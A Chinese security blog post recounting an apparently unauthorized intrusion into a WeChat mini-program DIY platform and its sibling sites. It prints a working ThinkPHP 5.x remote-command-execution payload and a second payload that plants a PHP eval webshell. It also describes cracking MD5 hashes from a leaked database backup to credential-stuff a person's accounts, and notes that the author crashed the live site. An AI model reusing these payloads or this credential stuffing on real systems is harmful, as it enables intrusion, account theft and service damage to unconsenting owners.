01
目标站:某微信小程序diy平台
https://scan.dyboy.cn/web/webside tscan
找到一个thinkphp的站
想办法报个错看看版本 5.0.10
这个版本好多洞 尝试 ThinkPHP 5.x 远程命令执行漏洞
参考文章:https://blog.csdn.net/u010433704/article/details/103258291
就是程序未对控制器进行过滤,导致攻击者可以通过引入符号来调用任意类方法。
Payload:public/index.php?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写shell
public/index.php?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1]
[]=../test.php&vars[1][]=<?php @eval($_POST['shell']);?>
蚁剑连接
发现个问题 好像日歪了 ip不对阿 发现一个数据库备份
md5解密去撞库 因为是他个人的qq号所以就打码了
其实到现在就开始出现了问题 因为主站那个后台我进去了之后查看功能的时候点了一下编译 大概是站点死循环了 联系管理员也不理 这就很尴尬了
通过https://ipchaxun.com/找到了几个旁站
访问/readme.html发现一个是wordpress的站 撞库失败
使用wpscan扫描一下 kali自带
sudo wpscan -url xxx.com --api-token
没有发现漏洞 版本是5.7.2 最新版本
| - server: nginx/1.19.10
| - x-powered-by: PHP/7.4.19
wp这个版本太高了没办法拿下
02
总结
其实好多无关紧要的都没有写 wp的xss 还有好几个小网站的撞库 尽量赶在周一前把剩下的写完,等主站能打开了再写后续 又水一篇.......
火线Zone社区火热上线啦!↓点击下方了解一下吧
【火线短视频精选】
用了这么多云服务,你的云服务到底安全吗?↓↓↓点击本期视频了解一下吧
【周度激励】
【相关精选文章】
火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火线小助手]加入。
我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!
欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!
本文始发于微信公众号(火线Zone):一次日歪了的渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论